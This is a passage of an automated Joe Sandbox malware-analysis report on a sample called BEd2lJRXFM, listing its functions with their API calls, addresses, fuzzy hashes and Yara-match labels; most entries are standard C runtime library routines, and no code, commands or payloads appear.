Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction ID: 2b89a8f42461ff02cd40fdb1c34544fcbc341af2e816b3d3e60f3ff1d9a816d3
Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction Fuzzy Hash: 2AB10632E042569FFB19EF28C881BBEBBF5EF45344F1445E9D8569B281D63CA901CB60

Function 00412822 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004128A9

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68

Function 04B51AE7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B51B6C
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B51B8B

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID:
API String ID: 3197321146-0
Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
Instruction ID: 8dc5865511a4316386b6f13be5d59717194a85531fbc1b293327a91944b0f5cd
Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
Instruction Fuzzy Hash: C8C15A70A002189FEB25DF28CD84BEAF7B5FB49704F1045D8E909A76A0DB75BA84CF50

Function 04D0A284 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 04D0A34B
___AdjustPointer.LIBCMT ref: 04D0A36E
___AdjustPointer.LIBCMT ref: 04D0A40A

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction ID: 310a62d73d8892820cd44f430255431bc3148a37fc81f5a5820d75d5061db37f
Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction Fuzzy Hash: A3518BB2A053069FEB299F94D840BAA77A5FB64314F14C12EE946473D1E732F881D6A0

Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 10003FA1
___AdjustPointer.LIBCMT ref: 10003FC4
___AdjustPointer.LIBCMT ref: 10004060

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794

Function 04B5B0EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 04B5B1B2
___AdjustPointer.LIBCMT ref: 04B5B1D5
___AdjustPointer.LIBCMT ref: 04B5B271

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction ID: f0f91e21489dd2b3f5d61b396b93867de32033a5c1fb75f05031b5ab79b51d22
Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction Fuzzy Hash: FA51B472A086069FEB29AF11E881B7AF7A4FF04714F1441ADDC05976B0E732B951CB60

Function 0040AE84 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040AF4B
___AdjustPointer.LIBCMT ref: 0040AF6E
___AdjustPointer.LIBCMT ref: 0040B00A

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A

Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70

GetLastError.KERNEL32 ref: 10007C36
__dosmaperr.LIBCMT ref: 10007C3D
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
__dosmaperr.LIBCMT ref: 10007C83

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
Opcode Fuzzy Hash: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0

Function 04B65CB0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 04B5FE6F: _free.LIBCMT ref: 04B5FE7D

Part of subcall function 04B6375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B688CA,?,?,?,00000000,?,04B68639,0000FDE9,00000000,?), ref: 04B63800

GetLastError.KERNEL32 ref: 04B65D18
__dosmaperr.LIBCMT ref: 04B65D1F
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 04B65D5E
__dosmaperr.LIBCMT ref: 04B65D65

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
Instruction ID: 234737ca5651d27d88351972188bb9b8350f9b42a595980b5a78a802e0359265
Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
Instruction Fuzzy Hash: B2210A71600609BFEB30AF65EC84E6BB7ADFF402687108598F82B97190E734FC5197A0

Function 00415A49 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16

Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599

GetLastError.KERNEL32 ref: 00415AB1
__dosmaperr.LIBCMT ref: 00415AB8
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
__dosmaperr.LIBCMT ref: 00415AFE

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4

Function 10008336 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
Opcode Fuzzy Hash: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0

Function 04B61DB1 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction ID: 10e501a6326293b87989ebfde8b0c7f65731c8e05e915298dfd041b8bb7db764
Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction Fuzzy Hash: 8D21BB71F01221ABD7318B6C9C84B5E7768EF457A4F154DA1ED17A7290EA38FD00C6E4

Function 04B61464 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(04B5213F,?,04B52143,04B5C610,?,04B5213F,0041D0A0,?,04B61714,00000000,0041D0A0,00000000,00000000,04B5213F), ref: 04B61469
_free.LIBCMT ref: 04B614C6
_free.LIBCMT ref: 04B614FC
SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B61714,00000000,0041D0A0,00000000,00000000,04B5213F), ref: 04B61507

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
Instruction ID: ac2e866c640517f47925a112d1fe9811a7f048fae99d2439ae5fcbaa023ac5ce
Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
Instruction Fuzzy Hash: 6B11C2327002042BF6213ABDAC89D3A265ADBC1379B6446F4FA27971E0EF2DAC129515

Function 004111FD Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,74DEDF80,?,004114AD,00000000,74DEDF80,00000000,00000000,00401ED8), ref: 00411202
_free.LIBCMT ref: 0041125F
_free.LIBCMT ref: 00411295
SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,74DEDF80,00000000,00000000,00401ED8), ref: 004112A0

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D

Function 04B615BB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,04B5C5A5,04B62748,?,?,04B5A3C2,?,?,?,04B51353,?,04B5370E,?,?), ref: 04B615C0
_free.LIBCMT ref: 04B6161D
_free.LIBCMT ref: 04B61653
SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B5A3C2,?,?,?,04B51353,?,04B5370E,?,?,?), ref: 04B6165E

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
Instruction ID: 74e6d6586d59cf540c062be9ddf1d1c3793cff97aad6a84319b88144a8058078
Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
Instruction Fuzzy Hash: C0110836B002003BF72266BDAC85D3A325ADBC1378F6403F5F527961E0DF6DAC115115

Function 00411354 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
_free.LIBCMT ref: 004113B6
_free.LIBCMT ref: 004113EC
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D

Function 04B5C07E Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,04B5C13F,?,?,0042B000,00000000,?,04B5C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 04B5C10E

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction ID: 898653dc82727d8dd82b85a0411300cbdfee08f486e8e4b98f034cdf5c12c683
Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction Fuzzy Hash: C811A731E41321ABDB225B789C45B9DBB75EF057A0F1541A1FE11B72A0D670F90086D9

Function 04D0A1A4 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04D0A1C0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04D0A1D9

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction ID: d6743a8683031a3c917c2138566a034c36869e37b34185b47a8c69e5e2325d7c
Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction Fuzzy Hash: 5F01843230D3116FEB342EB47C84BAA2B94FB65679770823AE910572E1FE1A78125255

Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45

Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B

___initconout.LIBCMT ref: 1000CD55

Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90

Function 04B6B089 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,04B6AD36,00000000,00000001,00000000,00000000,?,04B6830F,00000000,00000000,00000000), ref: 04B6B0A0
GetLastError.KERNEL32(?,04B6AD36,00000000,00000001,00000000,00000000,?,04B6830F,00000000,00000000,00000000,00000000,00000000,?,04B68863,?), ref: 04B6B0AC

Part of subcall function 04B6B072: CloseHandle.KERNEL32(0042A930,04B6B0BC,?,04B6AD36,00000000,00000001,00000000,00000000,?,04B6830F,00000000,00000000,00000000,00000000,00000000), ref: 04B6B082

___initconout.LIBCMT ref: 04B6B0BC

Part of subcall function 04B6B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,04B6B063,04B6AD23,00000000,?,04B6830F,00000000,00000000,00000000,00000000), ref: 04B6B047

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,04B6AD36,00000000,00000001,00000000,00000000,?,04B6830F,00000000,00000000,00000000,00000000), ref: 04B6B0D1

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction ID: 712831ebce8c7416a1db468e1cb6416e1177e5f1823a03889bfcc03e9bee3872
Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction Fuzzy Hash: 9FF03036901124BBCF226FA1DC089D97F36FF086A4F054460FE1ED6130C636A961DB95

Function 0041AE22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45

Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B

___initconout.LIBCMT ref: 0041AE55

Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A

Function 004091F8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE

Function 04D0FE46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04D0FE4F
_free.LIBCMT ref: 04D0FE62
_free.LIBCMT ref: 04D0FE73
_free.LIBCMT ref: 04D0FE84

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction ID: 9e77dd43e16f226c77f52d408170e4a81892d2b6fcb1cb276e2ad215f5ea0844
Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction Fuzzy Hash: 87E0EC71B13320AA97337F15BE8044AFF61EBD4B143C5003AE80812631C77629939BDE

Function 04B60CAD Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04B60CB6

Part of subcall function 04B61D29: HeapFree.KERNEL32(00000000,00000000,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?), ref: 04B61D3F
Part of subcall function 04B61D29: GetLastError.KERNEL32(?,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?,?), ref: 04B61D51

_free.LIBCMT ref: 04B60CC9
_free.LIBCMT ref: 04B60CDA
_free.LIBCMT ref: 04B60CEB

Memory Dump Source

